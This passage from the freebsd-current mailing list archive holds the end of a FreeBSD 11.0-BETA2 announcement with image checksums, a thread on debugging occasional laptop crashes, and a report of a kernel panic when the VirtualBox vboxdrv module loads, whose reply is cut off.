sparc64 GENERIC: SHA512 (FreeBSD-11.0-BETA2-sparc64-bootonly.iso) = 00d7c917e567ac90515be927b8ac849987e7d62a28c00d26aacaa423b45d81b94cb233099d42c34887b8e2e3ac240fb86f29cc2452e720e9f37786a9c52898ba SHA512 (FreeBSD-11.0-BETA2-sparc64-bootonly.iso.xz) = e3e91cf851553f68893663907d806d306a4904c456b7946eb7c87f2b8acc2ff53af6020bc23d5c83368772127eea889b1c60c2a54658778dbfaace87827f961e SHA512 (FreeBSD-11.0-BETA2-sparc64-disc1.iso) = ff6a943419f57cda170dd0b5b4e50cb9c0e16a106626ba49b2852c45d69227b58e06a3c0cd000596ff7fe6911fee539fea8cfecebbcf8f30a91ea6d0895623ef SHA512 (FreeBSD-11.0-BETA2-sparc64-disc1.iso.xz) = d4cdd336eb82c3865c7cf4d613d14ba26a7a283dd44a12afcbc4ad75d86f91bd5c5e7e07cc14fb6c1ac50eda6e7906a096694164bca85228b13709f25568aafd SHA256 (FreeBSD-11.0-BETA2-sparc64-bootonly.iso) = 16d851a982fd490d8098cb2a005cd44a3295bdec9faf2c464b2a47769e7b2c38 SHA256 (FreeBSD-11.0-BETA2-sparc64-bootonly.iso.xz) = 8808e4a6651538b7b7f5cb7dd67574bd9e7a84dfd5976459b6b308a30331795e SHA256 (FreeBSD-11.0-BETA2-sparc64-disc1.iso) = 23ed7fe9ca4d27735d2db06b97746ea746fbbc9ae35a8739537c8f5f4ed5dcfe SHA256 (FreeBSD-11.0-BETA2-sparc64-disc1.iso.xz) = 893649606d063d94968d737b65f125e34b42bc4baf812f09666b2250a463afe9 o 11.0-BETA2 armv6 BANANAPI: SHA512 (FreeBSD-11.0-BETA2-arm-armv6-BANANAPI.img.xz) = 8655a994bc485269586e4dc37cbc84d130b0e16bb98c2be920e1226f9c96b1228350cf9b17d3198cf7b8551311d13caccc0df8a95f14080a76a2697794cdea64 SHA256 (FreeBSD-11.0-BETA2-arm-armv6-BANANAPI.img.xz) = fc57f634f74d10cf1c4e447b96d49157b322ea957986bf3254ec286030e99530 o 11.0-BETA2 armv6 BEAGLEBONE: SHA512 (FreeBSD-11.0-BETA2-arm-armv6-BEAGLEBONE.img.xz) = ffac1d1b43c9dbbe19db791cb56c7878e80f729dc48ec09c40841af365573f31b17dfbeceb21c808bd321994230c203b9961e3dd4475353afb16249a54ae285c SHA256 (FreeBSD-11.0-BETA2-arm-armv6-BEAGLEBONE.img.xz) = bcd56dff27da74937f8928ed1693daf4ab3e0434445dd1b0cbab620c4897d733 o 11.0-BETA2 armv6 CUBIEBOARD: SHA512 (FreeBSD-11.0-BETA2-arm-armv6-CUBIEBOARD.img.xz) = 385ebcd1d4a9f5232492134897d49cd9394c0fbb492ca1c44a1fd98dd1ee9bdb76e598fe22e1197b924a8fc565c742fc69dcb96619f15831515985d412289a1a SHA256 (FreeBSD-11.0-BETA2-arm-armv6-CUBIEBOARD.img.xz) = 64aadaea9ebe03e4cf58394327ce062a46d2b1107775f36cecb184401e4a09d3 o 11.0-BETA2 armv6 CUBIEBOARD2: SHA512 (FreeBSD-11.0-BETA2-arm-armv6-CUBIEBOARD2.img.xz) = 828b49a4241f5301c7776b2c8b5a13bc72a1f1214c7bbcf49533899bca1af554e9adda034cb66267c2fcc9e639bad37433b35b84e64ddee0aeb6564785c0fc11 SHA256 (FreeBSD-11.0-BETA2-arm-armv6-CUBIEBOARD2.img.xz) = 6dc1e900131338a9cf0ae386d595b9d0b1076a8621da07015cd8e371391e4030 o 11.0-BETA2 armv6 CUBOX-HUMMINGBOARD: SHA512 (FreeBSD-11.0-BETA2-arm-armv6-CUBOX-HUMMINGBOARD.img.xz) = 978017ba75fde5003ccff1754b45144bb889d3ea42ef59706162cec31dd161395ec3b8ec54ef296a4b082fb8e7561c1aae7470d92ebf2bd83b7bad9436979bf1 SHA256 (FreeBSD-11.0-BETA2-arm-armv6-CUBOX-HUMMINGBOARD.img.xz) = 1e5a6bc1602cd9a32d205a2309e626efb14bf9595eeb9a475201d3679535b930 o 11.0-BETA2 armv6 GUMSTIX: SHA512 (FreeBSD-11.0-BETA2-arm-armv6-GUMSTIX.img.xz) = 87887d64ee2e00fb80727f060511539a5f7365421592726deff7484da2482fc1ea03492dda2bbd4f8ecace98dfeb01bca163c097ef03ae45d385271ad90cccd0 SHA256 (FreeBSD-11.0-BETA2-arm-armv6-GUMSTIX.img.xz) = f0ec539b4a970b47bc8c9ac87724cc2534a3690c9927a8f427b43cd5fc84910a o 11.0-BETA2 armv6 RPI-B: SHA512 (FreeBSD-11.0-BETA2-arm-armv6-RPI-B.img.xz) = d80288fa91e84f94a1c2051b15e4fede023d8d58c7b2da5d6459129adc5b60313ae73a41ba57030170bf7a9a5c8dc506bab71b6dbeb9eada7bd0c058353fd4b0 SHA256 (FreeBSD-11.0-BETA2-arm-armv6-RPI-B.img.xz) = ba24a8e1d728849f728779ae5c26ac46cbd21b046549408961d594c03e47dae7 o 11.0-BETA2 armv6 RPI2: SHA512 (FreeBSD-11.0-BETA2-arm-armv6-RPI2.img.xz) = 569871af879ef131f3e45cee283b97e6c8955444730167e1cea30648bde2aa63e822ef3380379b91354b2c02b701b92b141bff1a32610e28abfd456d689bbe1b SHA256 (FreeBSD-11.0-BETA2-arm-armv6-RPI2.img.xz) = b34912f54e775bd8b2a2b111ce193c1cb0b75d8039c08c4b8c509e76a1029cef o 11.0-BETA2 armv6 PANDABOARD: SHA512 (FreeBSD-11.0-BETA2-arm-armv6-PANDABOARD.img.xz) = 002b3038d2e95fe6b629e0f1ad502e3454eb92516f7fcadc30316b7849ee475fb2d0a104297adda8c60078b2f228fe91928b2174faa75ec7705fd21d581a58f1 SHA256 (FreeBSD-11.0-BETA2-arm-armv6-PANDABOARD.img.xz) = a787c9e96937db162c53cfceff5d4842cf347fa597501bd10cb2f440610864a4 o 11.0-BETA2 armv6 WANDBOARD: SHA512 (FreeBSD-11.0-BETA2-arm-armv6-WANDBOARD.img.xz) = b2e43b2b5d7a045d8a512fb5e37da59bc58c9c253bb185848da260e73e255c83277f006702dd26e4983681cbde0280cc87e552f1d5dcf9a5368e9d8d413b0698 SHA256 (FreeBSD-11.0-BETA2-arm-armv6-WANDBOARD.img.xz) = a6e0b0a2b0e4383d05f67b9b23272db07e3e27ef43e3a6e2174116389f8026e6 o 11.0-BETA2 aarch64 GENERIC: SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64-memstick.img) = b7f478509415b30367f176b43c81da7650bfcec19877c3e6c52c53227bc500f89b0838e9355acc9a62abab614d0126013524d65a720c60615836328c4cc7b015 SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64-memstick.img.xz) = 7308f33dcda71eda20aeb998515c28c75c1d713534ee2acd7f23f7e56f187330ae0d1233364f42216676543730956d795ec56b489bb8734d5c7c72a057e3f931 SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64-mini-memstick.img) = 53709016431f49035b578970d9a928daa8dd2ea0559060c67e17a8e8123b7ed07758cb31565f590ac98778836a86dcd8c93eb496d159064fb51a8550307f9a83 SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64-mini-memstick.img.xz) = 20d1082a00254f17d71fbb5180f4ec212cafab53095ebd461f7a6b29481968c83f0c43907dca2033f903797866dc0ae88493cf55b7e0423dae439f5ced245535 SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64-memstick.img) = 574a974f408acd8a6b0e7c8d6314606f3ddcbbe5ce9fe8ef9fec9fdfd21f4e1f SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64-memstick.img.xz) = 62142f61d87e6a72bf122fef724ef512f95a50eba13f871cf868e309a69f1ffd SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64-mini-memstick.img) = b80e2d039febc148dc29cb238ba2869301cecdd04eb504d47996b368cf0b1edb SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64-mini-memstick.img.xz) = 50f8896250a5bba449ff38f647e4e61b25e50135fba1c4f677ad5511b51c221d == VM IMAGE CHECKSUMS == o 11.0-BETA2 amd64: SHA512 (FreeBSD-11.0-BETA2-amd64.qcow2.xz) = 244e417810d1c87d91fef1addfa37c4ecb0112c2be4e12a86ae2dc6c65dd0ab2bb1d25fd16e318c581cecb99331b6fc7cdc6b0a5684c9bb3c824ea4d6be00536 SHA512 (FreeBSD-11.0-BETA2-amd64.raw.xz) = 56d9a5597680ebc7cbc132c53175bead3304572c49a9b46918997a845c0d710c5f7023720d04d02217dbebb11f61f6f06e7ec584e32f34247a3b24e78bc1e12e SHA512 (FreeBSD-11.0-BETA2-amd64.vhd.xz) = e0e562f99b401021b5433d13119b5f43ca455b6577408bb23dacd4115741be978102a284fde449b5b0eaffc28481a2abff5fac4d778d88f27165122d801887d8 SHA512 (FreeBSD-11.0-BETA2-amd64.vmdk.xz) = 5d58e5db969238bf071e516da977dce6837e2e4ec463eaed7acb971ca6e1a7db28a515edbdd3865147661d0f3e84e7701f2151a3cff3202b064f8c7e6928d2b6 SHA256 (FreeBSD-11.0-BETA2-amd64.qcow2.xz) = 545b72ac98a6a328efd7edb57717391b5fd9168ba755cffa40bb27dde93450f8 SHA256 (FreeBSD-11.0-BETA2-amd64.raw.xz) = e6ffdc73fae6f61e74bee6f4b297b1c272c1dde1eb49f0ad57017345127babf5 SHA256 (FreeBSD-11.0-BETA2-amd64.vhd.xz) = 9a33d4269816b35e17d57ed6c2ece7e232d330d2cd0fab709899f6964425a0c1 SHA256 (FreeBSD-11.0-BETA2-amd64.vmdk.xz) = 7fe0b08faf95614488f37e0821daf331fd4d401880444ac3ce43aa4b47245d41 o 11.0-BETA2 i386: SHA512 (FreeBSD-11.0-BETA2-i386.qcow2.xz) = a756211e3b5e27c7e824a1670f794d71958e43c180e66b0cea01a7370c8a0f77cbebd31de0c149c78d59cdc09a082ef0d68817fd0a3190401ff36583b0698ed2 SHA512 (FreeBSD-11.0-BETA2-i386.raw.xz) = fab44b18f4134f3f30a07914ba4ab3f76501029255be07badaedc5a3a8454a7a1730c24fd77e8319ef997b16889546a1a314ecf046b2c365cf2b265044c84629 SHA512 (FreeBSD-11.0-BETA2-i386.vhd.xz) = 469c99422ab0d5c308a63db9e77a58a1495cd7a5a13b667b116356a4b82d394d704ea98565a4a881cfef8891603a5309462930680fb8bada3d948aa19cc03913 SHA512 (FreeBSD-11.0-BETA2-i386.vmdk.xz) = 1cb1cd9f5e22c5f72531338303a8d52daa42448dcdd7866e819e8499693514d8a7b7d7f4a9b43587d1d7d30912c4beee63f88549f12d3a1db8fa72b0c4f80e84 SHA256 (FreeBSD-11.0-BETA2-i386.qcow2.xz) = 7dae9bdfbe8b7efc35fd4320fe7c6da888b687888392dab3546e05e0ec336978 SHA256 (FreeBSD-11.0-BETA2-i386.raw.xz) = 50de6c4b9a94973896443f60ee468d48976439af20d981c083455a4fde0c5091 SHA256 (FreeBSD-11.0-BETA2-i386.vhd.xz) = a0da7491b02fb21185a369551ced20605cdce0e02db80ae1c92b4b4be9207c81 SHA256 (FreeBSD-11.0-BETA2-i386.vmdk.xz) = 0ea1c3d4bc28153e982c32f38e859f35c0d81d6db01f00cf85705b1f9f3f776e o 11.0-BETA2 aarch64: SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64.qcow2.xz) = 812b66c9416390d050bb610d785e79a2f50dc5d9bf1560d49f1d3a8b43547600d5da7f205bc977849d5a1671503cffd2932026dddc66603e7307abbf019330e0 SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64.raw.xz) = f20b9d7fd91d3734e58b76e48aec0a6890d22f8543018410f0ead19c980fa73d3ab92d56c813319f80ce110355715c9c3e7ed04b7ffd9a2a2fbce754b59df791 SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64.vhd.xz) = 3a444c8fdde10b35bf9f4ac711be6d053af594133e629eee4f357964eba0dc7f84449133edca04a11b045f1c11b20835028331cc115a848a909e9e43e2593e9d SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64.vmdk.xz) = 4ac6911cc8fe65d3b6a18ac21a8b0cad5eee9a474bec0e0299a455ae64ce138f5ad8ed3b4525a69d2cbedc686d8f8afe853ea37c1d954f06d113728b43bfb349 SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64.qcow2.xz) = d0441fe165b655230692949e5257f84676dbae626cbdd194f75ce248091706a4 SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64.raw.xz) = d41e93301ac87035fe65969b51ca20d74127b2fc72947052710269534355780b SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64.vhd.xz) = 7017d48f6fdb411dcf4cabc6b059dc0ce5d95dafa4b451816ea950f620ba407f SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64.vmdk.xz) = 32f1c82aa547b28d8099247f20892fd4c8cf6e11bcadae916fdf9cc57bd31016 Regards, Glen Love FreeBSD? Support this and future releases with a donation to the FreeBSD Foundation! https://www.freebsdfoundation.org/donate/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQIcBAEBCAAGBQJXlRYjAAoJEAMUWKVHj+KT6E8P/1Thn9gKCDgT4skRqfoFuNBg ZTg6WbqbGdoHWEwsr6bEpF3Gvq0wI8e18rHIuJeDfvCpSTnuusdGj/C/aZ4x46LS FOp90hD2IVPhLO9B1OY2v7wLklxXWm2DJbPLX4nWOvhWmdEJg6AK7mIGrx6hto0f ZK25l1pEqLfczDob9To6UHmgYo7WTaGwXKqvrhuKvIIv+SLEeRyF9I3Ulpe5XeL2 fZejCxuM6MmQjVTOKfeo73I19XafZJcZlmML5tr9Zyqwqpshw/7Eu4lj8vmaXDXa 3yyDX2NRWVM5hfY1IDnglKap7Om52kmMaCSLjBuM/6OTQq6aPkOlVxNgqkuphI7s n/gUDCS7j4dvw3DR/Xh2MINhmKoL6jTBkNu9dMdLn0A/+cm+DwFCkT66Tgppnu9S LHQm83miPAsVI8jDlM6YzHLuz0FBbuxy6VJsedYYCLXawboVeTZlfKYCoCvWrE46 3JFlIUfRO+6hIw01W/piayQS/KLPZWAhDTfdywdszPcTlSUWzSReFSBB8rMFfFhq fUeH28hCZ7d2zH6i59MGbXUMZx+x9t8qyYTcuIO+ar56uPHDosMgY1+XDx+Yoaae KzXV2QNdS3A5RJsA6/GRzUuFKAdUbRR9e5aAQlTrQYLFZ3XmJKYJhInkFbP0kqlO pdF2s/Qf0FZ9AUshW11E =l81i -----END PGP SIGNATURE----- From owner-freebsd-current@freebsd.org Mon Jul 25 15:11:27 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 9DD1ABA3CE8 for ; Mon, 25 Jul 2016 15:11:27 +0000 (UTC) (envelope-from vangyzen@FreeBSD.org) Received: from smtp.vangyzen.net (hotblack.vangyzen.net [IPv6:2607:fc50:1000:7400:216:3eff:fe72:314f]) by mx1.freebsd.org (Postfix) with ESMTP id 8A3631DF9 for ; Mon, 25 Jul 2016 15:11:27 +0000 (UTC) (envelope-from vangyzen@FreeBSD.org) Received: from sweettea.beer.town (unknown [76.164.8.130]) by smtp.vangyzen.net (Postfix) with ESMTPSA id 0B9FA56488; Mon, 25 Jul 2016 10:11:26 -0500 (CDT) Subject: Re: seldom crashes on Dell E6330 with 12-CURRENT To: Matthias Apitz , freebsd-current@freebsd.org References: <20160723072128.GA2136@c720-r292778-amd64> From: Eric van Gyzen Message-ID: <551fda4a-4220-9be2-2409-9b8ad959827f@FreeBSD.org> Date: Mon, 25 Jul 2016 10:11:23 -0500 User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: <20160723072128.GA2136@c720-r292778-amd64> Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 25 Jul 2016 15:11:27 -0000 On 07/23/16 02:21 AM, Matthias Apitz wrote: > > Hello, > > I own since July 15 a new laptop and faced 3 crashes, details see below. > What can I do to gather more information? Thanks > > > notes in general: > - hardware: Dell E6330, amd64, 4 cores i5-3360M, 8 GByte RAM, 250 GByte SSD w/ TRIM > - WLAN: urtwn0: MAC/BB RTL8188CUS, RF 6052 1T1R > - kernel: GENERIC r302904 (July 15) > - poudriere 3.2-pre: compiling ~1800 ports in 4 builders > - swap as plain file in /usr/swap01, 8 GByte > - apart of the crashes below, no crash during buildworld, buildkernel and > ~48 hours of poudriere fetching distfiles and making ~1800 ports > - no errors on 'memtest 1G' > > crashes/observations: > > 16.07.2016 07:12 > - on shutdown swap device (plain file in /usr) could not be detached > - drop to kdb > - nothing in /var/log/messages > > 17.07.2016 19:41 > - hard locked, had to power-off > - last command issued on console (no X11): cp -p * /usr/PKGDIR (around 1700 files, 2 GByte) > - nothing in /var/log/messages > > 20.07.2016 19:27 > - hard locked, had to power-off > - last command issued in xterm: fgrep mra... ~/* > - nothing in /var/log/messages What file system are you using? Do a full fsck (or zfs scrub). Try moving swap to a raw (freebsd-swap) partition so that you might get a kernel core dump. That will be the essential next step. Without more details from a core dump or debugger, your best option is to try a release or an older build. If that works, try to find the commit that introduced the behavior. This will be very tedious and time-consuming for your scenario, so definitely try getting a core dump first. Eric From owner-freebsd-current@freebsd.org Mon Jul 25 16:10:52 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 6591ABA48C6 for ; Mon, 25 Jul 2016 16:10:52 +0000 (UTC) (envelope-from guru@unixarea.de) Received: from ms-10.1blu.de (ms-10.1blu.de [178.254.4.101]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 2DF471E14 for ; Mon, 25 Jul 2016 16:10:51 +0000 (UTC) (envelope-from guru@unixarea.de) Received: from [89.204.139.224] (helo=[10.190.143.224]) by ms-10.1blu.de with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:32) (Exim 4.76) (envelope-from ) id 1bRiSn-0002jC-G0 for freebsd-current@freebsd.org; Mon, 25 Jul 2016 18:10:41 +0200 From: Matthias Apitz To: Subject: Re: seldom crashes on Dell E6330 with 12-CURRENT Date: Mon, 25 Jul 2016 18:10:39 +0200 User-Agent: Dekko/0.6.20; Qt/5.4.1; ubuntumirclient; Linux; MIME-Version: 1.0 Message-ID: <10392d5e-79ca-4f5f-b3ac-802cb4cdea17@unixarea.de> In-Reply-To: <551fda4a-4220-9be2-2409-9b8ad959827f@FreeBSD.org> References: <20160723072128.GA2136@c720-r292778-amd64> Content-Type: text/plain; charset=utf-8; format=flowed Content-Transfer-Encoding: quoted-printable X-Con-Id: 51246 X-Con-U: 0-guru X-Originating-IP: 89.204.139.224 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 25 Jul 2016 16:10:52 -0000 On Monday, 25 July 2016 17:11:23 CEST, Eric van Gyzen=20 wrote: >=20 > What file system are you using? UFS; I followed the good instructions about new SSD disk configuration;=20 that's why I now have swap as plain file :-( > Do a full fsck (or zfs scrub). will do a full fsck; > Try moving swap to a raw (freebsd-swap) partition so that you might get > a kernel core dump. That will be the essential next step. ok, I will dump /usr to some external disk, shrink the partition, creat swap and re-create /usr >=20 > Without more details from a core dump or debugger, your best option is > to try a release or an older build. If that works, try to find the > commit that introduced the behavior. This will be very tedious and > time-consuming for your scenario, so definitely try getting a core dump > first. the problem is as well: until now no further crashes had occured, i.e. it'=20= difficult to see if it works or not; matthias --=20 Sent from my Ubuntu phone http://www.unixarea.de/ From owner-freebsd-current@freebsd.org Mon Jul 25 19:13:18 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 68107BA0D14 for ; Mon, 25 Jul 2016 19:13:18 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: from mail-qk0-x22d.google.com (mail-qk0-x22d.google.com [IPv6:2607:f8b0:400d:c09::22d]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 16C581B47 for ; Mon, 25 Jul 2016 19:13:18 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: by mail-qk0-x22d.google.com with SMTP id x1so172919670qkb.3 for ; Mon, 25 Jul 2016 12:13:18 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:subject:message-id:mime-version:content-disposition :user-agent; bh=uIC+rmG+ovTV219FfdHy5MON3JQSpw4gF1DjvQ8YVvY=; b=vvNuQlHcoXEvNw7jmwtLwjFpnQZkvjyn1YKHKsdMxh5bL24QAWB/mk9rPscBQG8P5P 51sDDJSIzT+5MwvLbyDZUnFPMFlpSVD2vHeZ0IIneZpVItXKe8y7quWeVUtAJguCuSFF 03qKTXyJulaB2EqUdIg2CWz+o5TFN4TBtro+sn5pA01DA+Wnf0XH/EeI4S67O+6RqWeP wTlTLLFwDCLFlnz4y5+UpsuUcUYtUFoCMZrxQc8bQ6z62+usy52RaUmwU9K0/pTAtoaX MS1q+Yi8vXbdYdedVLFgqei5sSdjs6D+erEz41qioVGkOoWrtsEIBIisj4OPHuYsZK2K Y25Q== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:subject:message-id:mime-version :content-disposition:user-agent; bh=uIC+rmG+ovTV219FfdHy5MON3JQSpw4gF1DjvQ8YVvY=; b=UR2rUMgpcsWG2R3IOFt6pOcbbBPuT7s/8ioxN5QMtH7ghup2Aua67t6gkTCdbBOIwJ rxYeiInmUaAsR+e5WAtE4vh9YX6cHQ41VodzN8ayui33k0XPzNMmzKc6zDx/3rqQdsWO 56YNXr0dx1qsfsqKM9mnMoUdEkmAFMs0o3c2oA/yEV3nBMIAwv8JQGsModQzaOzLDJ0Z JLy00IMhAMsa+prz1XHg1IVwI7A2eMmvH1bluL7MUBZim5GzvF+cz5Iu2/jfzlQ1q9SG AMPZGENngsPYVrTezrWAuyqywCEjYYOUANd2FaIrXsns8qhufveW7xVEMHOKVQm6UmMT Iwzg== X-Gm-Message-State: AEkoousX7b/nf2mEPTj32JmratBUNc3MXSJzZtK+4AHUC/DZiMJudZgTkOUmADPrFxJ9gA== X-Received: by 10.55.150.195 with SMTP id y186mr23153260qkd.7.1469473996854; Mon, 25 Jul 2016 12:13:16 -0700 (PDT) Received: from gmail.com (c-98-216-247-110.hsd1.ma.comcast.net. [98.216.247.110]) by smtp.gmail.com with ESMTPSA id 128sm16439364qke.10.2016.07.25.12.13.15 for (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Mon, 25 Jul 2016 12:13:15 -0700 (PDT) Date: Mon, 25 Jul 2016 15:13:14 -0400 From: Randy Westlund To: freebsd-current@freebsd.org Subject: Panic when loading vboxdrv module Message-ID: <20160725191314.GA10757@gmail.com> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="IJpNTDwzlM2Ie8A6" Content-Disposition: inline User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 25 Jul 2016 19:13:18 -0000 --IJpNTDwzlM2Ie8A6 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline I'm running 12-CURRENT r303286 and virtualbox-ose-kmod-5.0.26. I just rebuilt the module, so I know they're in sync. When I boot with vboxdrv_load="YES" in /etc/loader.conf, I get this panic during boot: > panic: mutex Giant owned at /usr/src/sys/kern/kern_sync.c:406 > cpuid = 0 > KDB: stack backtrace: > db_trace_self_wrapper() at db_trace_self_wrapper+0x2b > vpanic() at vpanic+0x182 > panic() at panic+0x43 > __mtx_assert() at __mtx_assert+0xd1 > mi_switch() at mi_switch+0x7b > sleepq_switch() at sleepq_switch+0x7e > sleepq_timedwait() at sleepq_timedwait+0x43 > rtR0SemEventWait() at rtR0SemEventWait+0x267 > supdrvGipCreate() at supdrvGipCreate+0x7f6 > supdrvInitDexExt() at supdrvInitDexExt+0x18f > VBoxDrvFreeBSDModuleEvent() at VBoxDrvFreeBSDModuleEvent+0x49 > module_register_init() at module_register_init+0xb0 > mi_startup() at mi_startup+0x118 > btext() at btext+0x2c > KDB: enter: panic > [ thread pid 0 tid 100000 ] > Stopped at kdb_enter+0x3b: movq $0,kdb_why I'm not sure whether this is a problem with the base system or the port, but this happens every time I boot with the module enabled. --IJpNTDwzlM2Ie8A6 Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXlmTKAAoJEGaweXjzNsmpAL4IAK+XerszWPChVM4lbgEmbATh x+Zmt4JhY9AY3V0rxPmrnKQGbGpLlWWPMB2jeEJQJbwZ7JjLEi4kQOIKASYyQFpY oWW0/rRtqgkcyaCkrt5H6rNAo2P/vA7kmvs3AQzb8ecKwYURUTYxLvM8BeBho6Vb v004+4xGSwy9/mymzWHzbUtZoCGsfSRCF4D/qhyxAgX1k1VKGmoNGv2Yet3QfGyi UPLzkFU+nXlPn7X20K4LmOc2tU1RP/PnZIcnkqQgatTkh1EywnMbYbBb54zznaz6 4iKBG0OokBLIl9Gz8/sYFm7Q5KP4c15aQlEpJon2K+zGmSkjd8FSkhEG9TxgKrM= =qGz5 -----END PGP SIGNATURE----- --IJpNTDwzlM2Ie8A6-- From owner-freebsd-current@freebsd.org Mon Jul 25 19:27:33 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id BA3C1BA136F for ; Mon, 25 Jul 2016 19:27:33 +0000 (UTC) (envelope-from jkim@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:1900:2254:206c::16:87]) by mx1.freebsd.org (Postfix) with ESMTP id 74CCB1849; Mon, 25 Jul 2016 19:27:33 +0000 (UTC) (envelope-from jkim@FreeBSD.org) Subject: Re: Panic when loading vboxdrv module To: Randy Westlund , freebsd-current@freebsd.org References: <20160725191314.GA10757@gmail.com> From: Jung-uk Kim Message-ID: <92c7634b-8f19-eccd-75a0-68e5fd98e597@FreeBSD.org> Date: Mon, 25 Jul 2016 15:27:26 -0400 User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: <20160725191314.GA10757@gmail.com> Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="hvoBB77eSQMHm9FMFPWF3i9ssxIf1Xc5a" X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 25 Jul 2016 19:27:33 -0000 This is an OpenPGP/MIME signed message (RFC 4880 and 3156) --hvoBB77eSQMHm9FMFPWF3i9ssxIf1Xc5a Content-Type: multipart/mixed; boundary="PLdIoFO9UNwmA4AlPfh7FMRoC2R6iB4vH" From: Jung-uk Kim To: Randy Westlund , freebsd-current@freebsd.org Message-ID: <92c7634b-8f19-eccd-75a0-68e5fd98e597@FreeBSD.org> Subject: Re: Panic when loading vboxdrv module References: <20160725191314.GA10757@gmail.com> In-Reply-To: <20160725191314.GA10757@gmail.com> --PLdIoFO9UNwmA4AlPfh7FMRoC2R6iB4vH Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: quoted-printable On 07/25/16 03:13 PM, Randy Westlund wrote: > I'm running 12-CURRENT r303286 and virtualbox-ose-kmod-5.0.26. I just > rebuilt the module, so I know they're in sync. When I boot with > vboxdrv_load=3D"YES" in /etc/loader.conf, I get this panic during boot:= >=20 >> panic: mutex Giant owned at /usr/src/sys/kern/kern_sync.c:406 >> cpuid =3D 0 >> KDB: stack backtrace: >> db_trace_self_wrapper() at db_trace_self_wrapper+0x2b >> vpanic() at vpanic+0x182 >> panic() at panic+0x43 >> __mtx_assert() at __mtx_assert+0xd1 >> mi_switch() at mi_switch+0x7b >> sleepq_switch() at sleepq_switch+0x7e >> sleepq_timedwait() at sleepq_timedwait+0x43 >> rtR0SemEventWait() at rtR0SemEventWait+0x267 >> supdrvGipCreate() at supdrvGipCreate+0x7f6 >> supdrvInitDexExt() at supdrvInitDexExt+0x18f >> VBoxDrvFreeBSDModuleEvent() at VBoxDrvFreeBSDModuleEvent+0x49 >> module_register_init() at module_register_init+0xb0 >> mi_startup() at mi_startup+0x118 >> btext() at btext+0x2c >> KDB: enter: panic >> [ thread pid 0 tid 100000 ] >> Stopped at kdb_enter+0x3b: movq $0,kdb_why >=20 > I'm 